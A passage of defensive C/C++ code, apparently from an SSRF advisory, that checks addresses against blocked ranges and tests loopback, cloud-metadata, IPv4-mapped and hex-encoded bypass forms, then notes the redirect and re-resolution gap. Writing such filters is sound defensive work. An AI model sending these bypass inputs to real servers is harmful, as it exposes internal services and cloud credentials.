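    if (b[0] == 0xFE && (b[1] & 0xC0) == 0x80) return true;     // fe80::/10 link-local
    if (b[0] == 0xFF) return true;                              // ff00::/8 multicast
    return false;
}

int main()
{
    // Constructed samples, including the loopback target from the report.
    const char* samples[] = {"127.0.0.1", "169.254.169.254", "::ffff:127.0.0.1",
                             "0x7f.0.0.1", "8.8.8.8", "2001:4860:4860::8888"};
    for (const char* s : samples) {
        printf("%-22s %s\n", s, is_blocked_address(s) ? "refuse" : "allow");
    }
    return 0;
}
```

The check only holds if the fetcher connects to the exact address that was checked and re-applies it to every redirect target; resolving the name a second time for the connection reopens the hole.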